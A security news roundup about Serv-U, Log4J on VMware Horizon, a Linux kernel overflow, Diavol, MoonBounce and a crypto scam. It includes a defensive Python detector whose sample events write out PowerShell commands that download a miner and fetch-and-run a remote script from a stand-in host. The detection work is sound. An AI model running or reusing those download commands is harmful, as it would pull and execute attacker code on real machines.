More stories


    Log4J: Microsoft discovers attackers targeting undisclosed SolarWinds vulnerability

    Microsoft researchers have discovered a previously undisclosed vulnerability in the SolarWinds Serv-U software while monitoring threats related to Log4J vulnerabilities. Jonathan Bar Or explained on Twitter that while he was hunting for a Log4J exploit attempt, he noticed attacks coming from serv-u.exe. 


    “Taking a closer look revealed you could feed Serv-U with data and it’ll build a LDAP query with your unsanitized input! This could be used for log4j attack attempts, but also for LDAP injection,” he wrote. “Solarwinds immediately responded, investigated and fixed the #vulnerability. Their response is the quickest I’ve seen, really amazing work on their part!”

    Microsoft later released a blog about the issue, tracked as CVE-2021-35247, and described it as an “input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.”

    In its advisory, SolarWinds said the Serv-U web login screen for LDAP authentication allowed characters that were not sufficiently sanitized. “SolarWinds has updated the input mechanism to perform additional validation and sanitization. No downstream effect has been detected as the LDAP servers ignored improper characters,” the company said, adding that the flaw affects Serv-U 15.2.5 and previous versions.

    NTT Application Security’s Ray Kelly told ZDNet that the vulnerability surprised and concerned him, considering SolarWinds is fresh off its previous breach that affected thousands of customers. “Given that the Log4j disclosure was published in December, this Open Source vulnerability should have been of the utmost priority for SolarWinds. While it appears that SolarWinds was not susceptible to have the vulnerable component exploited, it’s still not something you want in your software product,” Kelly said. “Most all application security products can detect the Log4j vulnerability, giving developers the ability to quickly identify and fix the issue.”

    Microsoft urged customers to apply the security updates described in the SolarWinds advisory and said customers can use its tools to identify and remediate devices that have the vulnerability. Microsoft Defender Antivirus and Microsoft Defender for Endpoint also detect behavior related to the activity, the company added.

    Netenrich’s John Bambenek added that Microsoft’s warning and SolarWinds’ quick response time represented a positive example of how vulnerabilities need to be dealt with. “This is the kind of vulnerability and research cooperation we need, where a major tech company with visibility to see the attacks reaches out to the software company and a fix is rushed to production,” Bambenek said.


    CISA adds 13 exploited vulnerabilities to list, 9 with Feb. 1 remediation date

    CISA released its latest update to the Known Exploited Vulnerabilities catalog, adding 13 new vulnerabilities. Nine of them have a remediation date of February 1 and four have a remediation date of July 18. The list includes an October CMS Improper Authentication vulnerability, a System Information Library for node.js Command Injection vulnerability, an Oracle Corporate Business Intelligence Enterprise Edition Path Traversal vulnerability, an Apache Airflow Experimental API Authentication Bypass vulnerability, a Drupal Core Unrestricted Upload of File vulnerability, and three Nagios XI OS Command Injection vulnerabilities.

    The October CMS Improper Authentication vulnerability, CVE-2021-32648, was allegedly used during a cyberattack on Ukrainian government systems last week. A patch was released in September 2021. The Media Trust CEO Chris Olson said the vulnerability’s alleged use in the recent attack on Ukraine explains the software’s inclusion on the list, but he noted that its inclusion highlights “an alarming growth in web-based cyberattacks and the role they will play in global cyber warfare.”

    “Little attention is paid to the Web as an attack surface. While organizations across the public and private sector are increasingly aware of cyber risk, the stack of third-party code used in Web development rarely meets the standards for AppSec that those organizations would demand from any of their IT systems,” Olson said.

    Jordan LaRose, director of incident response at F-Secure, told ZDNet that CISA’s guidance matches much of what they are seeing in the wild from a malicious actor standpoint. LaRose said that what stood out most to him was that these are all vulnerabilities affecting web servers or APIs. This is a trend LaRose said he has seen develop significantly in the past year among malicious actors, many of whom are turning to more than just classical methods like phishing or trojans to gain footholds in organizations with strong security postures.

    “What we’re seeing now is a wave of attacks where attackers are targeting technology rather than people, with the most recent notable example being the Log4Shell attacks. These attacks are largely done opportunistically, with attackers loading up scanning scripts with the exploits and hitting everything they can on the internet to find a potential victim,” he said.

    Neosec vice president Edward Roberts echoed that sentiment, adding that the volume of vulnerabilities involving APIs will continue to increase because more APIs are being developed each day. Most organizations, he said, “don’t even know how many APIs they have, let alone which ones have vulnerabilities, let alone consider how they are being defrauded by abusive behavior.”

    A number of cybersecurity experts noted that several of these vulnerabilities were identified months ago. Some of the vulnerabilities on the list date back to 2012 and 2013, according to Netenrich principal threat hunter John Bambenek, who expressed concern that they haven’t already been patched.

    “That the agency doesn’t have basic patch deployment information from other units of government implies there is no central management of that information. The posture of federal IT cybersecurity seems to have remained stalled at square one,” Bambenek said. “If an exploited vulnerability can be used to execute commands on the victim machine, then CISA sets a two week due date to patch. That being said, two weeks is far too slow. The Exchange vulnerability concerns me the most, however, some of this stuff is quite off the beaten path. But, this may be common in government installations so worthy to put on the list.”

    Vulcan Cyber CPO Tal Morgenstern noted that seven of the vulnerabilities with remediation dates of February 1 relate to systems management tools. “Systems management tools from VMware, Nagios, F5, Npm and more hold the keys to the kingdom, giving the user substantial power to automate system change for good or bad. This isn’t a new concern, as we’ve seen an unfortunate trend of vulnerabilities in systems management software tools this year,” Morgenstern explained. “Considering the amount of access and control these tools have, IT security teams must take immediate steps to fully mitigate known risks. Don’t wait for February. Move now.”


    Log4J: Attackers continue targeting VMware Horizon servers

    According to several cybersecurity companies monitoring the situation, attackers are still targeting VMware Horizon servers through Log4J vulnerabilities. 


    Two weeks ago, the UK’s National Health Service (NHS) issued a warning that an ‘unknown threat group’ is attempting to exploit a Log4j vulnerability (CVE-2021-44228) in VMware Horizon servers to establish web shells that could be used to distribute malware and ransomware, steal sensitive information, and carry out other malicious activity. Since then, several cybersecurity companies have confirmed that hackers are continuing to target VMware Horizon servers.

    In a statement to ZDNet, VMware said it continues to urge customers to apply the latest guidance in its security advisory, VMSA-2021-0028, to resolve CVE-2021-44228 and CVE-2021-45046. “We also recommend that customers visit our corresponding Questions & Answers document for the latest information and join the VMware Security-Announce mailing list for all future advisories. Any service connected to the internet and not yet patched for Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046 is vulnerable to hackers, and VMware strongly recommends patching,” a VMware spokesperson said.

    Rapid7 said it began monitoring a sudden increase in VMware Horizon exploitation on January 14 and identified five unique avenues that attackers have taken post-exploitation, signaling that multiple actors are involved in this mass exploitation activity. “The most common activity sees the attacker executing PowerShell and using the built-in System.Net.WebClient object to download cryptocurrency mining software to the system,” Rapid7 explained.

    Huntress released its own blog about the issue, noting that according to Shodan, about 25,000 Horizon servers are currently internet-accessible worldwide.
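    The post-exploitation pattern Rapid7 describes (PowerShell pulling a payload with System.Net.WebClient) is easy to hunt for in process-creation telemetry, including when the script is hidden behind -EncodedCommand. The following is an added example written for this page, not Rapid7’s or Huntress’s code: it assumes a Sysmon-style record with parent, image and command line, treats ws_TomcatService.exe as the Horizon service process (an assumption, not something stated above), and runs over constructed sample events rather than real telemetry.

```python
import base64
import re

# Added example: detection logic for the post-exploitation pattern Rapid7
# describes. Not Rapid7's or Huntress's code. The Horizon parent process name
# is an assumption; the events at the bottom are constructed, not real telemetry.

# Assumed Horizon Connection Server process hosting the vulnerable Log4j code,
# so any shell spawned from it is suspicious on its own.
HORIZON_PARENTS = {"ws_tomcatservice.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

WEBCLIENT = re.compile(r"(System\.)?Net\.WebClient", re.IGNORECASE)
DOWNLOAD = re.compile(r"Download(String|File|Data)", re.IGNORECASE)
# -e / -enc / -EncodedCommand followed by a base64 blob
ENCODED = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_command(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    match = ENCODED.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> list:
    """Tag a process-creation event. Returns [] when nothing is suspicious."""
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    # Match on the decoded script too, so encoding does not hide the download.
    text = cmdline if decoded is None else cmdline + " " + decoded
    tags = []
    if decoded is not None:
        tags.append("encoded_command")
    if WEBCLIENT.search(text) and DOWNLOAD.search(text):
        tags.append("webclient_download")
    if event["parent"].lower() in HORIZON_PARENTS and event["image"].lower() in SHELLS:
        tags.append("shell_from_horizon")
    return tags


def alerts(events):
    """Events worth a ticket: a WebClient download anywhere, or any shell
    spawned by the Horizon service regardless of what it ran."""
    return [(e, analyze(e)) for e in events
            if {"webclient_download", "shell_from_horizon"} & set(analyze(e))]


# Constructed sample events (not real telemetry); 198.51.100.7 is a documentation address.
SAMPLE_EVENTS = [
    {"parent": "ws_TomcatService.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"(New-Object System.Net.WebClient)"
                ".DownloadFile('http://198.51.100.7/xmrig.exe','C:\\Windows\\Temp\\svc.exe')\""},
    {"parent": "ws_TomcatService.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')")},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -c Get-ChildItem C:\\Users"},
    {"parent": "ws_TomcatService.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for event, tags in alerts(SAMPLE_EVENTS):
        print(tags, event["cmdline"][:80])
```

    The parent-process rule is the durable part: download cmdlets and object names change from campaign to campaign, but a Java service for a VDI broker has no business spawning a shell at all.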

    Roger Koehler, vice president of threat operations at Huntress, told ZDNet the NHS article didn’t give an idea of the scope of the problem. “Based on how many Horizon servers in our data set are unpatched (only 18% were patched as of last Friday night), there is a high risk of this seriously impacting hundreds, if not in the low thousands, of businesses. This weekend also marks the first time we’ve seen proof of widespread escalation, going from gaining initial access to starting to take hostile actions on Horizon servers,” Koehler said. “Since we’re seeing multiple likely unrelated campaigns (cryptominers, web shells, Cobalt Strike), it’s likely that this will continue to escalate. Attackers are going to make businesses pay for not fully patching when VMware gave their initial guidance. Although the initial web shell campaign appears to focus on long-term access, it’s likely that future activity will focus on targeting or impacting the systems accessible via VMware Horizon. And it makes sense: attackers can use this access to impact all the virtualized hosts and servers.”

    Koehler added that these are high-value targets, and people are not patching despite multiple, widespread campaigns targeting them, noting that Huntress recently witnessed the same pattern with ProxyShell and ProxyLogon. While those were not quite as significant and far-reaching as this latest wave of attacks, they serve as evidence that attackers will likely be back to target systems that haven’t yet been patched, Koehler explained. He said ProxyShell surfaced months after ProxyLogon was disclosed, and it was made possible only because many had failed to properly patch.

    “The timing is also significant. If we think back to the big Kaseya incident, they picked the July 4 holiday weekend. The original widespread intrusion with web shells took place over the Christmas holiday (they were dropped between December 25 and December 29), and things are escalating now that it’s another three-day weekend in the US. Is damage control going to become a holiday tradition for those in cybersecurity?” Koehler said. “The web shell attack between December 25 and 29 was more sophisticated compared to something like the Exchange attack. It seems like the majority of antivirus tools failed to identify that anything was wrong and still haven’t caught up. The moral of this story? It’s the same old song: patch, patch, patch.”


    After ransomware arrests, some dark web criminals are getting worried

    Cyber criminals are becoming anxious about being tracked down by law enforcement agencies following the high-profile arrests of suspected members of one of the most notorious ransomware groups. On January 14, Russia’s Federal Security Service (FSB) announced it had detained members of the REvil ransomware gang operating from several regions of the country and dismantled the group’s operations. Previous action by Europol resulted in the arrest of a suspected REvil affiliate near the Polish and Ukrainian border.


    According to analysis of chatter on dark web forums by cybersecurity researchers at Trustwave SpiderLabs, the recent arrests, particularly those by Russia, appear to have scared cyber criminals, some of whom appear to be worried that they might be next.

    Ransomware is one of the biggest cybersecurity issues facing organisations and the wider world today, with a string of incidents demonstrating how such attacks can impact utilities, healthcare, food production and other vital services that people need every day, while cyber criminals can walk away with huge sums of money when victims give in and pay the ransoms demanded for a decryption key.

    There’s a consensus among cybersecurity experts that many of the major ransomware operations work out of Russia, with the authorities willing to turn a blind eye towards attacks targeting the West. But following arrests throughout the region, some cyber criminals are wondering if the risk is worth it. “This is a big change. I have no desire to go to jail,” wrote one forum member.

    “In fact, one thing is clear, those who expect that the state would protect them will be greatly disappointed,” said another. There’s even concern that administrators of the dark web communities, who would have details about their users, could be coerced into working for law enforcement following arrest. Such is the paranoia among some forum members and ransomware affiliates that they suggest moving operations to a different jurisdiction, although this is unlikely to be a realistic option for many.

    “Those that are seasoned in cybercrime understand that by moving outside of Russia, they’ll be taking on an even greater risk of being arrested by international law enforcement agencies. These agencies that are keeping tabs on cyber criminals will be watching for such potential moves,” Ziv Mador, VP security research at Trustwave SpiderLabs, told ZDNet. “Also, there is a large talent pool in Russia already, so more members and affiliates can always be recruited. Recruiting can become more difficult in other geographies. There is a level of trust that is required, and that trust diminishes the further away a prospective member is from ‘home base’,” he added.

    However, while some users are anxious following the arrests, others are less sympathetic, blaming a string of high-profile attacks against major targets in the United States for the unwelcome attention. “It was necessary to think before climbing and encrypting multi-billion-dollar companies, schools, states. With whom did they dare to compete?” one user wrote. “They climbed everywhere indiscriminately without understanding which country [they were attacking],” said another.

    “Some cyber criminals may feel like REvil spoiled the ability to earn a living by attracting too much law enforcement attention and political powers. This kind of activity may have triggered a lack of sympathy by forum members,” said Mador.


    Nasty Linux kernel bug found and fixed

    Most reported Linux “security” bugs actually aren’t Linux bugs. For example, security vendor CrowdStrike’s report on the biggest Linux-based malware families was really about system administration security blunders with telnet, SSH, and Docker, not Linux at all. But, that doesn’t mean Linux doesn’t have security holes.  For example, a new nasty Linux kernel problem has just popped up.  

    In this one, there’s a heap overflow bug in the legacy_parse_param() function in the Linux kernel’s fs/fs_context.c. This function handles mount options for filesystems that still use the legacy (pre-fs_context) interface, during superblock creation for a mount and superblock reconfiguration for a remount. The superblock records all of a filesystem’s characteristics, such as filesystem size, block size, and empty and filled storage blocks. So, yeah, it’s important.

    The legacy_parse_param() “PAGE_SIZE - 2 - size” calculation was mistakenly evaluated as an unsigned type. This means a large value of “size” results in a high positive value instead of the negative value that was expected. Whoops. This, in turn, meant the code copies data beyond the memory slab allocated for it. And, as all programmers know, writing beyond the memory your program is supposed to have access to is a terrible thing. One big reason why Rust is being incorporated into Linux is that Rust makes this kind of memory mistake much harder to make. As every C developer knows, it’s all too easy to trip over memory handling in a C program.

    So, how bad is it? Under the Common Vulnerability Scoring System (CVSS) v3.1, it scores 7.7. That’s considered a high-severity vulnerability. A local attacker can use it to escalate their privileges or crash the system, using a specially crafted program that triggers the integer overflow. From there, the attacker can execute arbitrary code and gain root privileges.
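    To see why an unsigned “remaining space” check fails, here is a small model of the arithmetic, added for this page (it is not the kernel’s code, and it simplifies: the option string is modelled as a single PAGE_SIZE buffer that is appended to with a trailing NUL, and size_t is assumed to be 64 bits). The vulnerable check compares the new option’s length against PAGE_SIZE - 2 - size; once size has legitimately reached PAGE_SIZE - 1, that subtraction wraps to a huge value and any length passes. The fixed check moves the addition to the other side, so nothing can wrap.

```python
# Added example: a simplified model of the check in legacy_parse_param(), not
# the kernel's code. legacy_data is modelled as a PAGE_SIZE bytearray and
# size_t as a 64-bit unsigned value (an assumption).

PAGE_SIZE = 4096
SIZE_T_MASK = (1 << 64) - 1  # assume a 64-bit kernel


def remaining_unsigned(size: int) -> int:
    """PAGE_SIZE - 2 - size evaluated in unsigned arithmetic: once size exceeds
    PAGE_SIZE - 2 the result wraps to a huge value instead of going negative."""
    return (PAGE_SIZE - 2 - size) & SIZE_T_MASK


def check_vulnerable(size: int, length: int) -> bool:
    """Pre-fix shape of the check, `len > PAGE_SIZE - 2 - size`.
    Returns True when the copy is allowed."""
    return not (length > remaining_unsigned(size))


def check_fixed(size: int, length: int) -> bool:
    """Post-fix shape, `size + len + 2 > PAGE_SIZE`: the addition is on the
    other side of the comparison, so nothing can wrap."""
    return not (size + length + 2 > PAGE_SIZE)


def legacy_append(buf: bytearray, size: int, key: str, value, check) -> int:
    """Append ',key' or ',key=value' at offset size, the way the legacy mount
    option string is accumulated. Returns the new size. Raises ValueError when
    the check rejects the option and OverflowError when the write would leave
    the page (the real kernel would silently corrupt the adjacent slab memory)."""
    length = len(key) + (1 + len(value) if value is not None else 0)
    if not check(size, length):
        raise ValueError("VFS: Legacy: Cumulative options too large")
    chunk = "," + key + ("=" + value if value is not None else "")
    end = size + len(chunk)
    if end + 1 > PAGE_SIZE:  # +1 for the terminating NUL
        raise OverflowError(f"{len(chunk)}-byte write at offset {size} leaves the {PAGE_SIZE}-byte page")
    buf[size:end] = chunk.encode()
    buf[end] = 0
    return end


def simulate(check) -> str:
    """Two options: the first fills the page to exactly PAGE_SIZE - 1 bytes,
    which is permitted; the second is then judged against a wrapped
    remaining-space value. Returns 'ok', 'rejected' or 'overflow'."""
    buf = bytearray(PAGE_SIZE)
    try:
        size = legacy_append(buf, 0, "a" * (PAGE_SIZE - 2), None, check)
        legacy_append(buf, size, "b", "x" * 64, check)
    except ValueError:
        return "rejected"
    except OverflowError:
        return "overflow"
    return "ok"


if __name__ == "__main__":
    print("vulnerable check:", simulate(check_vulnerable))  # overflow
    print("fixed check:     ", simulate(check_fixed))       # rejected
```

    The lesson generalises beyond this bug: a bounds check written as `len > capacity - used` is only safe if `used` can never exceed `capacity`; writing it as `used + len > capacity` removes the wrap entirely (as long as the addition itself cannot overflow).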

    Exploiting it requires the CAP_SYS_ADMIN capability, but only within a user namespace. On systems where unprivileged user namespaces are enabled, an unprivileged local user can create one, obtain CAP_SYS_ADMIN inside it, and then open a filesystem that does not support the File System Context application programming interface (API). In that situation the kernel drops back to legacy handling, and from there the flaw can be used to escalate the attacker’s privileges on the host.

    Exploiting it is not as hard as you might think. Its discoverer, Linux kernel developer William Liu, reports he created exploits against Ubuntu 20.04 and container escape exploits against Google’s hardened Container-Optimized OS (COS). This security hole was introduced on Feb 28, 2019, in the Linux 5.1-rc1 kernel, and it is present in every kernel released since then up to the fix. Fortunately, the patch is in.

    Until you can patch, you can also close off the unprivileged path by disabling user namespaces. On the Red Hat Linux family, set user.max_user_namespaces to 0 with the following shell commands:

    echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
    sysctl -p /etc/sysctl.d/userns.conf

    On Ubuntu and related distros, the equivalent is:

    sysctl -w kernel.unprivileged_userns_clone=0

    Note that sysctl -w only changes the running kernel; to keep the setting across reboots, put it in a file under /etc/sysctl.d as in the Red Hat example. Keep in mind, too, that container platforms such as Red Hat OpenShift Container Platform need user namespaces enabled, so you cannot disable them there; in those circumstances, you’ll need to patch as soon as your distributor makes the fix available. Stay safe, stay patched.


    FBI warning: This new ransomware makes demands of up to $500,000

    The Federal Bureau of Investigation (FBI) has detailed evidence connecting the new Diavol ransomware to the TrickBot Group, the prolific gang behind the eponymous banking trojan. Diavol hit researchers’ radars in mid-2021 when Fortinet published a technical analysis that established some links to Wizard Spider, another name for the TrickBot Group, which researchers have also been tracking in connection with the “double extortion” Ryuk ransomware.


    Ryuk is selectively deployed against high-value targets that are subjected to a double extortion racket, where their data is encrypted, stolen and then potentially leaked unless a ransom is paid.

    TrickBot’s tools include the Anchor_DNS backdoor, a tool for transmitting data between victim machines and TrickBot-controlled servers using Domain Name System (DNS) tunneling to hide malicious traffic within normal DNS traffic. The FBI has been on to Diavol since October. Its link between Diavol and TrickBot is that the unique bot identifier (Bot ID) generated by Diavol for each victim is “nearly identical” to the format used by TrickBot and Anchor_DNS malware. Once the Bot ID is generated by Diavol, files on that machine are encrypted and appended with the “.lock64” file extension, and the machine displays the ransom message.

    “Diavol is associated with developers from the Trickbot Group, who are responsible for the Trickbot Banking Trojan,” the FBI said in a new flash note, warning that it has seen extortion demands of up to $500,000.

    Unlike Ryuk, the FBI has not seen Diavol leak victim data, despite the group’s message containing a threat to do so. Diavol’s ransom note states: “Take into consideration that we have also downloaded data from your network That In case of not making payment will be published on our news website.”

    “Diavol encrypts files solely using an RSA encryption key, and its code is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker,” the FBI said. “While ransom demands have ranged from $10,000 to $500,000, Diavol actors have been willing to engage victims in ransom negotiations and accept lower payments.”

    Although the FBI acknowledges some victims have negotiated down ransoms with Diavol actors, it still discourages such agreements, since paying doesn’t guarantee files will be recovered, and advises against payment because it might embolden the attackers and fund future attacks. On the other hand, the FBI expresses sympathy for victims that do negotiate with attackers. “The FBI understands that when victims are faced with an inability to function, all options are evaluated to protect shareholders, employees and customers. The FBI may be able to provide threat mitigation resources to those impacted by Diavol ransomware,” it said.

    The FBI is also calling on victim organizations to share with it “boundary logs showing communication to and from foreign IP addresses, Bitcoin wallet information, the decryptor file, and/or a benign sample of an encrypted file.” But providing mitigation resources is different from helping recover paid funds. In Colonial Pipeline’s case, the FBI and Justice Department recovered about half of the extorted funds by using the Bitcoin public ledger to trace the payments back to “a specific address, for which the FBI has the ‘private key,’ or the rough equivalent of a password needed to access assets accessible from the specific Bitcoin address.” But not every victim organization is a critical infrastructure provider that attracts the attention of the White House, which has since called on the Kremlin to take action against ransomware attackers located in Russia. Russian authorities last week conducted a rare raid against members of REvil, which has links to DarkSide.


    Chinese APT deploys MoonBounce implant in UEFI firmware

    Security researchers have unveiled MoonBounce, a custom UEFI firmware implant used in targeted attacks. 

    The implant is believed to be the work of APT41, a sophisticated Chinese-speaking hacking group also known as Winnti or Double Dragon. On January 20, Kaspersky researchers said that at the end of last year, the team uncovered a case of Unified Extensible Firmware Interface (UEFI) compromise caused by the modification of a single component of the firmware image, the CORE_DXE driver, held in the SPI flash chip on the motherboard. “Due to its emplacement on SPI flash, which is located on the motherboard instead of the hard disk, the implant is capable of persisting in the system across disk formatting or replacement,” the team noted.

    Not only did the tweak to the firmware result in persistence at a level that is extremely difficult to remove, but the team also says that the firmware image was “modified by attackers in a way that allowed them to intercept the original execution flow of the machine’s boot sequence and introduce a sophisticated infection chain.” The developer of the MoonBounce UEFI rootkit is said to have a deep and thorough understanding of how UEFI systems work.

    “The source of the infection starts with a set of hooks that intercept the execution of several functions in the EFI Boot Services Table, namely AllocatePool, CreateEventEx and ExitBootServices,” the researchers explained. “Those hooks are used to divert the flow of these functions to malicious shellcode that the attackers append to the CORE_DXE image, which in turn sets up additional hooks in subsequent components of the boot chain, namely the Windows loader.”

    “This multistage chain of hooks facilitates the propagation of malicious code from the CORE_DXE image to other boot components during system startup, allowing the introduction of a malicious driver to the memory address space of the Windows kernel.”

    Kaspersky says that this single patch turned the UEFI firmware “into a highly stealthy and persistent storage for malware in the system”, one which was made more difficult to detect as there was no need to add new drivers or make further changes. In addition, the infection chain operates in memory only, so the fileless attack leaves no traces on the hard drive.

    Kaspersky has not been able to obtain a sample of the payload yet, nor has the team discovered how the initial infection occurred, although it is presumed that the infection was achieved remotely. However, non-UEFI implants were found on the targeted network, including ScrambleCross/SideWalk malware, which communicated with the same attacker infrastructure. Through analysis of this activity, likely attribution has been possible.

    To the best of Kaspersky’s knowledge, APT41 is the advanced persistent threat (APT) group behind the intrusion. The Chinese-speaking APT is a state-sponsored outfit believed to be responsible for widespread attacks against the IT sector, social media companies, telecoms, non-profits, and healthcare. In terms of the victim organization, in this case, Kaspersky mentioned a target that “corresponds to an organization in control of several enterprises dealing with transport technology.” In September 2020, the US Department of Justice (DoJ) filed charges against five suspected members of APT41.

    “We can now say that UEFI threats are gradually becoming a norm,” Kaspersky says. “With this in mind, vendors are taking more precautions to mitigate attacks like MoonBounce, for example, by enabling Secure Boot by default. We assess that, in this ongoing arms race, attacks against UEFI will continue to proliferate, with attackers evolving and finding ways to exploit and bypass current security measures.”

    Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0


    Amazon fake crypto token investment scam steals Bitcoin from victims

    A new cryptocurrency-related scam is abusing the Amazon brand to dupe would-be investors into handing over Bitcoin (BTC). 

    Cryptocurrency and digital token scams have become a common threat facing investors and the general public today. Even though regulators worldwide are clamping down on fraud, through tax legislation, securities offering registration, tighter rules surrounding cryptocurrency adverts, and by keeping a close eye on initial coin offerings (ICOs), exit scams, rug pulls, and theft are still rampant. Interest in cryptocurrency, and now NFTs, continues to escalate, providing a breeding ground for new scams to appear on a daily basis. Chainalysis estimates that fraudsters received approximately $14 billion in deposits in 2021.

    On Thursday, cybersecurity researchers from Akamai Technologies outlined a new, fraudulent campaign that leverages Amazon’s name to promote a fake “Amazon to create its own digital token” scheme. Generating panic and encouraging victims to make a rash decision are common tactics used in a variety of scams, and this is no exception. In the Amazon scheme, the fraudsters have imposed a ‘time-sensitive’ lure to make individuals feel like they could be losing out on a lucrative investment opportunity.

    The campaign began with fake social media posts in groups interested in the cryptocurrency space. If users clicked on a post, they were directed to a fake “CNBC Decoded” news website that included an article on the soon-to-be-released ‘Amazon crypto token.’ The cyberattackers gave visitors roughly 30 seconds to read the fake release before they were automatically redirected to a domain that offered pre-sale tokens. The website in question was fully functional and required signing up, email account confirmation, and user profile creation.

    “The website included social engineering techniques that presented a fake progress bar, indicating tokens were about to sell out, adding pressure to the victim’s purchasing decision,” Akamai says. At this stage, visitors were asked to pay for the pre-sale tokens with their own cryptocurrency, including Bitcoin (BTC) and Ethereum (ETH). As the tokens are non-existent, these funds ended up in the wallets of the attackers. Another lure is also presented: a fake referral program that promises rewards if users refer friends and family. This expands the reach of the token scam on behalf of the attackers with no further effort on their part.

    Most of the visitors to the fake token landing pages were using mobile devices (98%). The distribution of mobile operating systems in use is fairly even but leans toward Android handsets (56%), followed by Apple iOS (42%). The majority of victims are located in North America, South America, and Asia. “Based on our research, we predict that crypto scams will continue to drive many nefarious activities throughout the 2022 threat landscape,” the researchers commented. Akamai has reported its findings to Amazon.